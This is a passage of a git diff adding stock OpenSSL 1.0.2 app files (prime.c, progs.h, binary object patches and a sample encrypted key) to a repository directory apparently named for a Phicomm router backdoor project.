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
BC))r3

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/prime.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/prime.c
new file mode 100644
index 0000000..1fb1c8d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/prime.c
@@ -0,0 +1,151 @@
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ *
+ */
+
+#include <string.h>
+
+#include "apps.h"
+#include <openssl/bn.h>
+
+#undef PROG
+#define PROG prime_main
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    int hex = 0;
+    int checks = 20;
+    int generate = 0;
+    int bits = 0;
+    int safe = 0;
+    BIGNUM *bn = NULL;
+    BIO *bio_out;
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    --argc;
+    ++argv;
+    while (argc >= 1 && **argv == '-') {
+        if (!strcmp(*argv, "-hex"))
+            hex = 1;
+        else if (!strcmp(*argv, "-generate"))
+            generate = 1;
+        else if (!strcmp(*argv, "-bits"))
+            if (--argc < 1)
+                goto bad;
+            else
+                bits = atoi(*++argv);
+        else if (!strcmp(*argv, "-safe"))
+            safe = 1;
+        else if (!strcmp(*argv, "-checks"))
+            if (--argc < 1)
+                goto bad;
+            else
+                checks = atoi(*++argv);
+        else {
+            BIO_printf(bio_err, "Unknown option '%s'\n", *argv);
+            goto bad;
+        }
+        --argc;
+        ++argv;
+    }
+
+    if (argv[0] == NULL && !generate) {
+        BIO_printf(bio_err, "No prime specified\n");
+        goto bad;
+    }
+
+    if ((bio_out = BIO_new(BIO_s_file())) != NULL) {
+        BIO_set_fp(bio_out, stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            bio_out = BIO_push(tmpbio, bio_out);
+        }
+#endif
+    }
+
+    if (generate) {
+        char *s;
+
+        if (!bits) {
+            BIO_printf(bio_err, "Specifiy the number of bits.\n");
+            return 1;
+        }
+        bn = BN_new();
+        BN_generate_prime_ex(bn, bits, safe, NULL, NULL, NULL);
+        s = hex ? BN_bn2hex(bn) : BN_bn2dec(bn);
+        BIO_printf(bio_out, "%s\n", s);
+        OPENSSL_free(s);
+    } else {
+        if (hex)
+            BN_hex2bn(&bn, argv[0]);
+        else
+            BN_dec2bn(&bn, argv[0]);
+
+        BN_print(bio_out, bn);
+        BIO_printf(bio_out, " is %sprime\n",
+                   BN_is_prime_ex(bn, checks, NULL, NULL) ? "" : "not ");
+    }
+
+    BN_free(bn);
+    BIO_free_all(bio_out);
+
+    return 0;
+
+ bad:
+    BIO_printf(bio_err, "options are\n");
+    BIO_printf(bio_err, "%-14s hex\n", "-hex");
+    BIO_printf(bio_err, "%-14s number of checks\n", "-checks <n>");
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/prime.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/prime.o
new file mode 100644
index 0000000000000000000000000000000000000000..aa7090f226506a0827067377a5ec555ad8d13711
GIT binary patch
literal 5336
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
Dj&us>

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/privkey.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/privkey.pem
new file mode 100644
index 0000000..0af4647
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/privkey.pem
@@ -0,0 +1,18 @@
+-----BEGIN RSA PRIVATE KEY-----
+Proc-Type: 4,ENCRYPTED
+DEK-Info: DES-EDE3-CBC,BA26229A1653B7FF
+
+6nhWG8PKhTPO/s3ZvjUa6226NlKdvPDZFsNXOOoSUs9ejxpb/aj5huhs6qRYzsz9
+Year47uaAZYhGD0vAagnNiBnYmjWEpN9G/wQxG7pgZThK1ZxDi63qn8aQ8UjuGHo
+F6RpnnBQIAnWTWqr/Qsybtc5EoNkrj/Cpx0OfbSr6gZsFBCxwX1R1hT3/mhJ45f3
+XMofY32Vdfx9/vtw1O7HmlHXQnXaqnbd9/nn1EpvFJG9+UjPoW7gV4jCOLuR4deE
+jS8hm+cpkwXmFtk3VGjT9tQXPpMv3JpYfBqgGQoMAJ5Toq0DWcHi6Wg08PsD8lgy
+vmTioPsRg+JGkJkJ8GnusgLpQdlQJbjzd7wGE6ElUFLfOxLo8bLlRHoriHNdWYhh
+JjY0LyeTkovcmWxVjImc6ZyBz5Ly4t0BYf1gq3OkjsV91Q1taBxnhiavfizqMCAf
+PPB3sLQnlXG77TOXkNxpqbZfEYrVZW2Nsqqdn8s07Uj4IMONZyq2odYKWFPMJBiM
+POYwXjMAOcmFMTHYsVlhcUJuV6LOuipw/FEbTtPH/MYMxLe4zx65dYo1rb4iLKLS
+gMtB0o/Wl4Xno3ZXh1ucicYnV2J7NpVcjVq+3SFiCRu2SrSkZHZ23EPS13Ec6fcz
+8X/YGA2vTJ8MAOozAzQUwHQYvLk7bIoQVekqDq4p0AZQbhdspHpArCk0Ifqqzg/v
+Uyky/zZiQYanzDenTSRVI/8wac3olxpU8QvbySxYqmbkgq6bTpXJfYFQfnAttEsC
+dA4S5UFgyOPZluxCAM4yaJF3Ft6neutNwftuJQMbgCUi9vYg2tGdSw==
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/progs.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/progs.h
new file mode 100644
index 0000000..d79b974
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/progs.h
@@ -0,0 +1,366 @@
+/* apps/progs.h */
+/* automatically generated by progs.pl for openssl.c */
+
+extern int verify_main(int argc,char *argv[]);
+extern int asn1parse_main(int argc,char *argv[]);
+extern int req_main(int argc,char *argv[]);
+extern int dgst_main(int argc,char *argv[]);
+extern int dh_main(int argc,char *argv[]);
+extern int dhparam_main(int argc,char *argv[]);
+extern int enc_main(int argc,char *argv[]);
+extern int passwd_main(int argc,char *argv[]);
+extern int gendh_main(int argc,char *argv[]);
+extern int errstr_main(int argc,char *argv[]);
+extern int ca_main(int argc,char *argv[]);
+extern int crl_main(int argc,char *argv[]);
+extern int rsa_main(int argc,char *argv[]);
+extern int rsautl_main(int argc,char *argv[]);
+extern int dsa_main(int argc,char *argv[]);
+extern int dsaparam_main(int argc,char *argv[]);
+extern int ec_main(int argc,char *argv[]);
+extern int ecparam_main(int argc,char *argv[]);
+extern int x509_main(int argc,char *argv[]);
+extern int genrsa_main(int argc,char *argv[]);
+extern int gendsa_main(int argc,char *argv[]);
+extern int genpkey_main(int argc,char *argv[]);
+extern int s_server_main(int argc,char *argv[]);
+extern int s_client_main(int argc,char *argv[]);
+extern int speed_main(int argc,char *argv[]);
+extern int s_time_main(int argc,char *argv[]);
+extern int version_main(int argc,char *argv[]);
+extern int pkcs7_main(int argc,char *argv[]);
+extern int cms_main(int argc,char *argv[]);
+extern int crl2pkcs7_main(int argc,char *argv[]);
+extern int sess_id_main(int argc,char *argv[]);
+extern int ciphers_main(int argc,char *argv[]);
+extern int nseq_main(int argc,char *argv[]);
+extern int pkcs12_main(int argc,char *argv[]);
+extern int pkcs8_main(int argc,char *argv[]);
+extern int pkey_main(int argc,char *argv[]);
+extern int pkeyparam_main(int argc,char *argv[]);
+extern int pkeyutl_main(int argc,char *argv[]);
+extern int spkac_main(int argc,char *argv[]);
+extern int smime_main(int argc,char *argv[]);
+extern int rand_main(int argc,char *argv[]);
+extern int engine_main(int argc,char *argv[]);
+extern int ocsp_main(int argc,char *argv[]);
+extern int prime_main(int argc,char *argv[]);
+extern int ts_main(int argc,char *argv[]);
+extern int srp_main(int argc,char *argv[]);
+
+#define FUNC_TYPE_GENERAL	1
+#define FUNC_TYPE_MD		2
+#define FUNC_TYPE_CIPHER	3
+#define FUNC_TYPE_PKEY		4
+#define FUNC_TYPE_MD_ALG	5
+#define FUNC_TYPE_CIPHER_ALG	6
+
+typedef struct {
+	int type;
+	const char *name;
+	int (*func)(int argc,char *argv[]);
+	} FUNCTION;
+DECLARE_LHASH_OF(FUNCTION);
+
+FUNCTION functions[] = {
+	{FUNC_TYPE_GENERAL,"verify",verify_main},
+	{FUNC_TYPE_GENERAL,"asn1parse",asn1parse_main},
+	{FUNC_TYPE_GENERAL,"req",req_main},
+	{FUNC_TYPE_GENERAL,"dgst",dgst_main},
+#ifndef OPENSSL_NO_DH
+	{FUNC_TYPE_GENERAL,"dh",dh_main},
+#endif
+#ifndef OPENSSL_NO_DH
+	{FUNC_TYPE_GENERAL,"dhparam",dhparam_main},
+#endif
+	{FUNC_TYPE_GENERAL,"enc",enc_main},
+	{FUNC_TYPE_GENERAL,"passwd",passwd_main},
+#ifndef OPENSSL_NO_DH
+	{FUNC_TYPE_GENERAL,"gendh",gendh_main},
+#endif
+	{FUNC_TYPE_GENERAL,"errstr",errstr_main},
+	{FUNC_TYPE_GENERAL,"ca",ca_main},
+	{FUNC_TYPE_GENERAL,"crl",crl_main},
+#ifndef OPENSSL_NO_RSA
+	{FUNC_TYPE_GENERAL,"rsa",rsa_main},
+#endif
+#ifndef OPENSSL_NO_RSA
+	{FUNC_TYPE_GENERAL,"rsautl",rsautl_main},
+#endif
+#ifndef OPENSSL_NO_DSA
+	{FUNC_TYPE_GENERAL,"dsa",dsa_main},
+#endif
+#ifndef OPENSSL_NO_DSA
+	{FUNC_TYPE_GENERAL,"dsaparam",dsaparam_main},
+#endif
+#ifndef OPENSSL_NO_EC
+	{FUNC_TYPE_GENERAL,"ec",ec_main},
+#endif
+#ifndef OPENSSL_NO_EC
+	{FUNC_TYPE_GENERAL,"ecparam",ecparam_main},
+#endif
+	{FUNC_TYPE_GENERAL,"x509",x509_main},
+#ifndef OPENSSL_NO_RSA
+	{FUNC_TYPE_GENERAL,"genrsa",genrsa_main},
+#endif
+#ifndef OPENSSL_NO_DSA
+	{FUNC_TYPE_GENERAL,"gendsa",gendsa_main},
+#endif
+	{FUNC_TYPE_GENERAL,"genpkey",genpkey_main},
+#if !defined(OPENSSL_NO_SOCK)
+	{FUNC_TYPE_GENERAL,"s_server",s_server_main},
+#endif
+#if !defined(OPENSSL_NO_SOCK)
+	{FUNC_TYPE_GENERAL,"s_client",s_client_main},
+#endif
+#ifndef OPENSSL_NO_SPEED
+	{FUNC_TYPE_GENERAL,"speed",speed_main},
+#endif
+#if !defined(OPENSSL_NO_SOCK)
+	{FUNC_TYPE_GENERAL,"s_time",s_time_main},
+#endif
+	{FUNC_TYPE_GENERAL,"version",version_main},
+	{FUNC_TYPE_GENERAL,"pkcs7",pkcs7_main},
+#ifndef OPENSSL_NO_CMS
+	{FUNC_TYPE_GENERAL,"cms",cms_main},
+#endif
+	{FUNC_TYPE_GENERAL,"crl2pkcs7",crl2pkcs7_main},
+	{FUNC_TYPE_GENERAL,"sess_id",sess_id_main},
+#if !defined(OPENSSL_NO_SOCK)
+	{FUNC_TYPE_GENERAL,"ciphers",ciphers_main},
+#endif
+	{FUNC_TYPE_GENERAL,"nseq",nseq_main},
+#if !defined(OPENSSL_NO_DES) && !defined(OPENSSL_NO_SHA1)
+	{FUNC_TYPE_GENERAL,"pkcs12",pkcs12_main},
+#endif
+	{FUNC_TYPE_GENERAL,"pkcs8",pkcs8_main},
+	{FUNC_TYPE_GENERAL,"pkey",pkey_main},
+	{FUNC_TYPE_GENERAL,"pkeyparam",pkeyparam_main},
+	{FUNC_TYPE_GENERAL,"pkeyutl",pkeyutl_main},
+	{FUNC_TYPE_GENERAL,"spkac",spkac_main},
+	{FUNC_TYPE_GENERAL,"smime",smime_main},
+	{FUNC_TYPE_GENERAL,"rand",rand_main},
+#ifndef OPENSSL_NO_ENGINE
+	{FUNC_TYPE_GENERAL,"engine",engine_main},
+#endif
+#ifndef OPENSSL_NO_OCSP
+	{FUNC_TYPE_GENERAL,"ocsp",ocsp_main},
+#endif
+	{FUNC_TYPE_GENERAL,"prime",prime_main},
+	{FUNC_TYPE_GENERAL,"ts",ts_main},
+#ifndef OPENSSL_NO_SRP
+	{FUNC_TYPE_GENERAL,"srp",srp_main},
+#endif
+#ifndef OPENSSL_NO_MD2
+	{FUNC_TYPE_MD,"md2",dgst_main},
+#endif
+#ifndef OPENSSL_NO_MD4
+	{FUNC_TYPE_MD,"md4",dgst_main},
+#endif
+#ifndef OPENSSL_NO_MD5
+	{FUNC_TYPE_MD,"md5",dgst_main},
+#endif
+#ifndef OPENSSL_NO_SHA
+	{FUNC_TYPE_MD,"sha",dgst_main},
+#endif
+#ifndef OPENSSL_NO_SHA1
+	{FUNC_TYPE_MD,"sha1",dgst_main},
+#endif
